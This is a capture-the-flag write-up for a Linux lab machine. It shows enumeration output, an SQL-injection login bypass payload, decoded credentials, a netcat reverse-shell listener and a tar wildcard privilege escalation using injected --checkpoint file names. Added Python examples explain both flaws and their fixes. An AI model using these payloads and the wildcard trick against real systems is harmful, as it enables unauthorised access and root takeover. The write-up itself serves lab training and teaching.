# Cockpit

`SQLi` `Auth bypass` `Wildcard` `tar`

* Machine name: Cockpit
* Difficulty: Intermediate
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-09 09:25 EDT
Nmap scan report for 192.168.242.10
Host is up (0.033s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp   open  http            Apache httpd 2.4.41 ((Ubuntu))
|_http-title: blaze
|_http-server-header: Apache/2.4.41 (Ubuntu)
9090/tcp open  ssl/zeus-admin?
| ssl-cert: Subject: commonName=blaze/organizationName=d2737565435f491e97f49bb5b34ba02e
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2024-08-09T13:25:32
|_Not valid after:  2124-07-16T13:25:32
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|     margin: 0 0 10px;
|_    @font-face {
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

We land on a web page.

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.242.10/ 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.242.10/__24-08-09_09-26-26.txt

Target: http://192.168.242.10/

[09:26:26] Starting: 
[09:26:29] 403 -  279B  - /.ht_wsr.txt
[09:26:29] 403 -  279B  - /.htaccess.bak1
[09:26:29] 403 -  279B  - /.htaccess.sample
[09:26:29] 403 -  279B  - /.htaccess.orig
[09:26:29] 403 -  279B  - /.htaccess.save
[09:26:29] 403 -  279B  - /.htaccess_sc
[09:26:29] 403 -  279B  - /.htaccess_extra
[09:26:29] 403 -  279B  - /.htaccessBAK
[09:26:29] 403 -  279B  - /.htaccessOLD
[09:26:29] 403 -  279B  - /.htaccess_orig
[09:26:29] 403 -  279B  - /.htaccessOLD2
[09:26:29] 403 -  279B  - /.htm
[09:26:29] 403 -  279B  - /.html
[09:26:29] 403 -  279B  - /.htpasswd_test
[09:26:29] 403 -  279B  - /.htpasswds
[09:26:29] 403 -  279B  - /.httr-oauth
[09:26:30] 301 -  313B  - /js  ->  http://192.168.242.10/js/
[09:26:31] 403 -  279B  - /.php
[09:26:42] 301 -  314B  - /css  ->  http://192.168.242.10/css/
[09:26:46] 301 -  314B  - /img  ->  http://192.168.242.10/img/
[09:26:47] 200 -  455B  - /js/
[09:26:47] 200 -  379B  - /login.php
[09:26:48] 302 -    0B  - /logout.php  ->  login.php
[09:26:57] 403 -  279B  - /server-status
[09:26:57] 403 -  279B  - /server-status/
```

login.php looks interesting.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FuvWyOWlRoiWd1Le9aM2v%2Fed38ea987ea1b24fa96a2b40757a7cec.png?alt=media&#x26;token=2dc2773c-a73f-4f3d-84c9-d4c99fcc7823" alt=""><figcaption></figcaption></figure>

We tried brute-forcing the page with short wordlists and Burp Suite, without success.

### Zeus-admin (9090)

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FWnOXB4zcJcyJPyWEMkdb%2F207b61453b9c57b85a0c995c59a27abb.png?alt=media&#x26;token=125dad99-e788-4752-8691-9814b53f3da4" alt=""><figcaption></figcaption></figure>

We tried several username and password combinations: no success. We then tried clicking "Other Options" and entered admin@localhost. We get a result, whatever credentials we use.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FddkuTBUe8IFMXUB0GV1b%2F14fbfcd53198292d06b91f2b7bb69749.png?alt=media&#x26;token=3a1e75b6-0bdb-4bb8-a215-3e8184f8050f" alt=""><figcaption></figcaption></figure>

Which leads nowhere... That is fairly normal, since it is trying to connect over SSH.

Let's go back to the page on port 80.

## Initial access

After some searching, we find an exploit for Blaze.

```
┌──(kali㉿kali)-[~]
└─$ searchsploit blaze
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Des | windows/remote/43993.py
Blaze Apps - Multiple Vulnerabilities                     | asp/webapps/12734.txt
Blaze Apps 1.x - SQL Injection / HTML Injection           | multiple/webapps/33995.txt
Blaze HDTV Player 6.0 - '.plf' Local Buffer Overflow (SEH | windows/local/9346.pl
BlazeBoard 1.0 - Information Disclosure                   | php/webapps/22901.txt
BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflo | windows/remote/6217.pl
BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overf | windows/local/13905.py
BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)           | windows/local/16618.rb
BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow  | windows/local/9329.pl
BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Ov | windows/local/9360.pl
BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH | windows/local/13998.pl
BlazeDVD 6.0 - Local Buffer Overflow (Metasploit)         | windows/local/14077.rb
BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploi | windows/local/23783.rb
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)         | windows/local/29263.pl
BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow  | windows/local/48776.py
BlazeDVD 7.0.2 - Buffer Overflow (SEH)                    | windows/local/48329.py
BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer O | windows/local/26889.pl
BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP  | windows/local/32737.pl
BlazeDVD Pro Player 7.0 - '.plf' Direct RET Local Stack B | windows/local/34331.py
BlazeDVD Pro Player 7.0 - '.plf' Local Buffer Overflow (S | windows/local/34371.py
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow | windows/local/2880.c
BlazeVideo HDTV Player 3.5 - '.PLF' File Stack Buffer Ove | windows/remote/32129.cpp
BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local O | windows/local/7975.py
BlazeVideo HDTV Player 6.6 Professional - Direct RETN     | windows/local/22931.py
BlazeVideo HDTV Player 6.6 Professional - Local Overflow  | windows/local/18693.py
BlazeVideo HDTV Player 6.6 Professional - Universal ASLR  | windows/local/17939.py
BlazeVideo HDTV Player Pro 6.6 - Filename Handling (Metas | windows/local/23052.rb
BlazeVideo HDTV Player Standard - '.plf' File Remote Buff | windows/remote/38394.py
MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabil | hardware/webapps/34128.py
Outblaze Webmail - Cookie Authentication Bypass           | cgi/webapps/22364.c
Outblaze Webmail - HTML Injection                         | php/webapps/24291.txt
Pendulab ChatBlazer 8.5 - 'Username' Cross-Site Scripting | php/webapps/37095.txt
---------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                           
┌──(kali㉿kali)-[~]
└─$ searchsploit -m multiple/webapps/33995.txt
  Exploit: Blaze Apps 1.x - SQL Injection / HTML Injection
      URL: https://www.exploit-db.com/exploits/33995
     Path: /usr/share/exploitdb/exploits/multiple/webapps/33995.txt
    Codes: N/A
 Verified: True
File Type: HTML document, ASCII text
Copied to: /home/kali/33995.txt

┌──(kali㉿kali)-[~]
└─$ cat /home/kali/33995.txt      
source: https://www.securityfocus.com/bid/40212/info

Blaze Apps is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker may exploit the HTML-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is displayed, and launch other attacks.

The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Blaze Apps 1.4.0.051909 and prior are vulnerable.

HTML Injection

<script>alert('Stored XSS')</script>

SQL Injection

aa' OR [SQL] OR 'a'='1                                       
```

Let's try a SQL injection.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FmXdi9h0tz0GSbmF3JGIZ%2F38cda1c12457f7e107ad5e13534ee4d2.png?alt=media&#x26;token=fafc4693-483b-4dae-aa11-636d553bc604" alt=""><figcaption></figcaption></figure>

Oops, we are blocked. When we try other special characters, a SQL error message appears. Let's test with a list of payloads for bypassing authentication.

{% embed url="https://book.hacktricks.xyz/pentesting-web/login-bypass#xpath-injection-authentication-bypass" %}

We will use: `' or''='`
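Why this payload works, as an added example that is not part of the original writeup: the same login query built by string concatenation and with bound parameters, run against a constructed in-memory users table. That login.php on the target concatenates both fields into one query is an assumption.

```python
# Added example (not from the original writeup). The users table is
# constructed for this demo; how login.php really builds its query is assumed.
import sqlite3

PAYLOAD = "' or''='"


def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "demo-pass-1"), ("bob", "demo-pass-2")])
    return con


def build_vulnerable_sql(username: str, password: str) -> str:
    """The query string a concatenating login handler would send."""
    return (f"SELECT username FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def login_vulnerable(con, username, password):
    """Returns every username the user-controlled query matches."""
    sql = build_vulnerable_sql(username, password)
    return [row[0] for row in con.execute(sql)]


def login_safe(con, username, password):
    """Same logic with bound parameters: the quote in the payload stays data."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in con.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    # With the payload in both fields the WHERE clause reads
    #   username='' or''='' AND password='' or''=''
    # AND binds tighter than OR, so the trailing or''='' makes it true
    # for every row; with the payload only in the username field and a
    # wrong password, nothing matches.
    print(build_vulnerable_sql(PAYLOAD, PAYLOAD))
    print(login_vulnerable(db, PAYLOAD, PAYLOAD))
    print(login_vulnerable(db, PAYLOAD, "wrong"))
    print(login_safe(db, PAYLOAD, PAYLOAD))
```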

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FIwFggtE412jNe4T6xpHV%2F7600d679a1570c30a72eaabd6e764e16.png?alt=media&#x26;token=1e8e24ee-5300-450e-846e-857511438604" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~]
└─$ echo 'Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=' | base64 -d
canttouchhhthiss@455152                                                                                                
┌──(kali㉿kali)-[~]
└─$ echo 'dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy' | base64 -d
thisscanttbetouchedd@455152                                             
```

We now have two users and two passwords. Let's go back to port 9090.

Let's enter james's credentials. Bingo!

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FXXfbFhDezgxyTqemM7xZ%2F91580fa08803b74e3b03ce69f5ec3247.png?alt=media&#x26;token=90aa339c-90c6-4272-afac-9f8b56353940" alt=""><figcaption></figcaption></figure>

Digging around the page a little, we find a terminal...

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FMdxqXbQUh5V8pxoKVU7K%2F7059ec3d649aa50d297b99db1694a265.png?alt=media&#x26;token=7cc97272-9ae7-4c35-ba12-240771464a16" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234         
listening on [any] 1234 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.242.10] 54688
james@blaze:~$ whoami
whoami
james
```

## Privilege escalation

```
james@blaze:~$ sudo -l
sudo -l
Matching Defaults entries for james on blaze:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on blaze:
    (ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *
```

{% embed url="https://gtfobins.github.io/gtfobins/tar/#sudo" %}

A very well-known privilege escalation: abusing wildcards...

```
james@blaze:/tmp$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
james@blaze:/tmp$ echo "" > --checkpoint-action=exec=sh
echo "" > --checkpoint-action=exec=sh
james@blaze:/tmp$ sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *
```

We are root!
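The mechanism behind that sudo rule, as an added example that is not part of the original writeup: the shell expands `*` into the directory's file names, so names that start with `-` reach tar as options, and an option-terminating `--` before the operands is the fix on tar's side. The directory listing is constructed; C-locale sort order is assumed.

```python
# Added example (not from the original writeup). LISTING is a constructed
# snapshot of /tmp after the two `echo "" > ...` commands in the writeup.
from typing import List

FIXED = ["/usr/bin/tar", "-czvf", "/tmp/backup.tar.gz"]

LISTING = ["backup.tar.gz", "notes.txt", "--checkpoint=1",
           "--checkpoint-action=exec=sh", ".hidden"]


def glob_star(listing: List[str]) -> List[str]:
    """What `*` expands to: non-hidden names, sorted (C-locale order assumed).
    '-' sorts before letters, so the checkpoint files come first."""
    return sorted(n for n in listing if not n.startswith("."))


def tar_argv(listing: List[str], terminate_options: bool = False) -> List[str]:
    """argv tar receives from `sudo tar -czvf /tmp/backup.tar.gz *`,
    or from the same command with `--` placed before the `*`."""
    return FIXED + (["--"] if terminate_options else []) + glob_star(listing)


def parsed_as_options(argv: List[str]) -> List[str]:
    """Words after the fixed arguments that GNU tar's option parser treats
    as options rather than file operands. tar permutes options, so their
    position does not matter; only `--` ends option parsing."""
    opts = []
    for word in argv[len(FIXED):]:
        if word == "--":
            break
        if word.startswith("-"):
            opts.append(word)
    return opts


if __name__ == "__main__":
    # Rule as granted: two file names are parsed as --checkpoint options.
    print(parsed_as_options(tar_argv(LISTING)))
    # With `--` the same names are ordinary operands to archive.
    print(parsed_as_options(tar_argv(LISTING, terminate_options=True)))
```

Note that the `*` in the sudoers line is also sudo's own wildcard and matches any argument string, so the rule should name an explicit directory rather than rely on `--` alone.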
